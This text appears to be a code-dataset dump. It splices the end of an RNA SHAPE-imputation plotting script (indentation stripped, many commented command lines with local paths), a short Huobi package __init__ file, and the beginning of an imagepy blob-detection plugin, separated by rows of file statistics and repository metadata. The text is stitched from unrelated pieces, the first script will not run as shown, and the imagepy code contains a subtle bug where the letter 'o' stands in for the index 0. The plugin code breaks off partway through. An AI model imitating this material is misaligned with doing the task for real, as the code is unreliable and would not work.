mean_null_dict['mean_null_x_predict'].append(mean_null2)
mean_null_dict['mean_null_y'].append(mean_null3)
mean_null_dict['mean_null_y_predict'].append(mean_null4)
for i,j in mean_null_dict.items():
df_validate_merge[i] = j
plt.close()
pdf.close()
df_validate_merge.to_csv(savefn.replace('.pdf','.txt'), header=True, index=False, sep='\t')
col_ls = ['mean_reactivity_x', 'mean_reactivity_x_predict', 'mean_reactivity_y', 'mean_reactivity_y_predict']
df_plot_mean = df_validate_merge.loc[:, col_ls].mean(axis=0)
fig,ax=plt.subplots()
for i in df_validate_merge.index:
ax.plot(range(0, len(col_ls)), df_validate_merge.loc[i, col_ls], color='grey', lw=0.8, alpha=0.5)
ax.plot(range(0, len(col_ls)), df_plot_mean, color='blue', lw=1.2)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.pdf'))
plt.close()
fig,ax=plt.subplots(figsize=(8,8))
df_validate_merge[col_ls].plot(kind='box')
r1,p1 = stats.ttest_ind(df_validate_merge['mean_reactivity_x'],df_validate_merge['mean_reactivity_x_predict'])
r2,p2 = stats.ttest_ind(df_validate_merge['mean_reactivity_y'],df_validate_merge['mean_reactivity_y_predict'])
r3,p3 = stats.ttest_ind(df_validate_merge['mean_reactivity_x'],df_validate_merge['mean_reactivity_y'])
r4,p4 = stats.ttest_ind(df_validate_merge['mean_reactivity_x_predict'],df_validate_merge['mean_reactivity_y_predict'])
title = 'n={}; p1: {:.3f}, p2: {:.3f}, \np3: {:.3f}, p4:{:.3f}'.format(df_validate_merge.shape[0], p1,p2,p3,p4)
plt.title(title)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.box.pdf'))
plt.close()
col_ls = ['mean_null_x', 'mean_null_x_predict', 'mean_null_y', 'mean_null_y_predict']
df_plot_mean = df_validate_merge.loc[:, col_ls].mean(axis=0)
fig,ax=plt.subplots()
for i in df_validate_merge.index:
ax.plot(range(0, len(col_ls)), df_validate_merge.loc[i, col_ls], color='grey', lw=0.8, alpha=0.5)
ax.plot(range(0, len(col_ls)), df_plot_mean, color='blue', lw=1.2)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.null.pdf'))
plt.close()
fig,ax=plt.subplots(figsize=(8,8))
df_validate_merge[col_ls].plot(kind='box')
r1,p1 = stats.ttest_ind(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_x_predict'])
r2,p2 = stats.ttest_ind(df_validate_merge['mean_null_y'],df_validate_merge['mean_null_y_predict'])
r3,p3 = stats.ttest_ind(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_y'])
r4,p4 = stats.ttest_ind(df_validate_merge['mean_null_x_predict'],df_validate_merge['mean_null_y_predict'])
# p1 = stats.ks_2samp(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_x_predict'])[1]
# p2 = stats.ks_2samp(df_validate_merge['mean_null_y'],df_validate_merge['mean_null_y_predict'])[1]
# p3 = stats.ks_2samp(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_y'])[1]
# p4 = stats.ks_2samp(df_validate_merge['mean_null_x_predict'],df_validate_merge['mean_null_y_predict'])[1]
title = 'n={}; p1: {:.3f}, p2: {:.3f}, \np3: {:.3f}, p4:{:.3f}'.format(df_validate_merge.shape[0], p1,p2,p3,p4)
plt.title(title)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.null2.pdf'))
plt.close()
def main():
####################################################################
### define parser of arguments
parser = argparse.ArgumentParser(description='Plot correlation bar of multiple condition')
parser.add_argument('--validation_ls', type=str, help='Validation file list')
parser.add_argument('--predict_ls', type=str, help='Predict file list')
parser.add_argument('--label_ls', type=str, help='Lable list')
parser.add_argument('--savefn', type=str, default='/home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_cy.pdf', help='Path to plot file')
# get args
args = parser.parse_args()
util.print_args('Plot correlation bar of multiple condition', args)
compare_predict(validation_ls=args.validation_ls, predict_ls=args.predict_ls, label_ls=args.label_ls, savefn=args.savefn)
# validation_wc = '/home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt'
# predict_wc = '/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt'
# validation_ch = '/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt'
# predict_ch = '/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_cy_vivo_0.1.txt'
# validation_ls = ':'.join([validation_wc, validation_ch])
# predict_ls = ':'.join([predict_wc, predict_ch])
# label_ls = 'wc:ch'
# compare_predict(validation_ls=validation_ls, predict_ls=predict_ls, label_ls=label_ls, savefn=args.savefn)
if __name__ == '__main__':
main()
'''
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_cy_vivo_0.1.NULLasWC.txt --label_ls wc:cy_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_cy.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_ch_vivo_0.1.NULLasWC.txt --label_ls wc:ch_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_ch.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_np_vivo_0.1.NULLasWC.txt --label_ls wc:np_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_np.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_np_vivo0.1.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_ch_vivo0.1.txt --label_ls wc:ch --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_ch.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_cy_vivo0.1.txt --label_ls wc:ch --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_np_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_cy_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_ch_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_ch.pdf
# c94
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_np_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_cy_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_ch_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_ch.pdf
# d06
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_K562_vivo --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_vivo.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_fibroblast_vitro --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_fibroblast_vitro.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_fibroblast_vivo --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_fibroblast_vivo.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_fibroblast_vivo:DMSseq_fibroblast_vitro --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.fibroblast_vitro_vs_vivo.pdf
# d10
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_K562_vitro --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.K562_vivo_vs_vitro.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_fibroblast_vivo --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.vivo_K562_vs_fibroblast.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_K562_vitro --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.vitro_K562_vs_fibroblast.pdf
'''
| 130.64878
| 975
| 0.82403
| 3,823
| 26,783
| 5.436307
| 0.069056
| 0.05774
| 0.091421
| 0.115479
| 0.883318
| 0.868979
| 0.85185
| 0.843526
| 0.835491
| 0.831641
| 0
| 0.059569
| 0.057312
| 26,783
| 205
| 976
| 130.64878
| 0.763585
| 0.052496
| 0
| 0.223141
| 0
| 0.016529
| 0.194723
| 0.066925
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024793
| false
| 0
| 0.157025
| 0
| 0.190083
| 0.041322
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
905e73b142c5378a5b79189c0c81b763097450ca
| 149
|
py
|
Python
|
hb_quant/huobi/constant/__init__.py
|
wenli135/Binance-volatility-trading-bot
|
75a03ad61df0e95492128fb6f1f419d4dc256ab3
|
[
"MIT"
] | 611
|
2019-07-10T08:17:50.000Z
|
2022-03-21T18:56:39.000Z
|
hb_quant/huobi/constant/__init__.py
|
wenli135/Binance-volatility-trading-bot
|
75a03ad61df0e95492128fb6f1f419d4dc256ab3
|
[
"MIT"
] | 105
|
2019-07-12T03:43:41.000Z
|
2022-03-30T10:33:06.000Z
|
hb_quant/huobi/constant/__init__.py
|
wenli135/Binance-volatility-trading-bot
|
75a03ad61df0e95492128fb6f1f419d4dc256ab3
|
[
"MIT"
] | 325
|
2019-07-12T02:46:54.000Z
|
2022-03-21T18:56:41.000Z
|
from huobi.constant.definition import *
from huobi.constant.result import *
from huobi.constant.system import *
from huobi.constant.test import *
| 18.625
| 39
| 0.791946
| 20
| 149
| 5.9
| 0.4
| 0.305085
| 0.576271
| 0.584746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127517
| 149
| 7
| 40
| 21.285714
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9072ebd509b3ec8099f763646c2bfde9709c9c96
| 7,700
|
py
|
Python
|
imagepy/menus/Process/Features/blob_plgs.py
|
CsatiZoltan/imagepy
|
df44caef2822f2c543b9fa4ef6132a7b1014623e
|
[
"BSD-4-Clause"
] | 1
|
2020-05-16T12:30:30.000Z
|
2020-05-16T12:30:30.000Z
|
imagepy/menus/Process/Features/blob_plgs.py
|
HeLiangHIT/imagepy
|
9a60ad3b1e8f79f2dcc47e4f246a4f31a96f99f5
|
[
"BSD-4-Clause"
] | null | null | null |
imagepy/menus/Process/Features/blob_plgs.py
|
HeLiangHIT/imagepy
|
9a60ad3b1e8f79f2dcc47e4f246a4f31a96f99f5
|
[
"BSD-4-Clause"
] | null | null | null |
from imagepy import IPy
import numpy as np
from imagepy.core.engine import Simple
from skimage.feature import blob_dog, blob_doh, blob_log
from imagepy.core.mark import GeometryMark
import pandas as pd
class Dog(Simple):
title = 'Blob Dog'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':50, 'sigma_ratio':1.6, 'threshold':0.1,
'overlap':0.5, 'exclude_border':False, 'showid':True, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(float, 'sigma_ratio', (1.3, 5), 1, 'ratio', '1.3~5'),
(float, 'threshold', (0.1, 10), 1, 'threshold', '0.1~10'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'exclude_border', 'exclude border'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_dog(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
sigma_ratio=para['sigma_ratio'], threshold=para['threshold'],
overlap=para['overlap'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_dog(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
sigma_ratio=para['sigma_ratio'], threshold=para['threshold'],
overlap=para['overlap'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
if para['slice']: df.insert(o, 'SliceID', sid)
IPy.show_table(df, ips.title+'-dogblob')
class Doh(Simple):
title = 'Blob Doh'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':30, 'num_sigma':10, 'threshold':0.01,
'overlap':0.5, 'log_scale':False, 'showid':True, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(int, 'num_sigma', (5, 30), 0, 'num', 'sigma'),
(float, 'threshold', (0.01, 1), 2, 'threshold', '0.1~10'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'log_scale', 'log scale'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_doh(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'])
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_doh(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'])
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
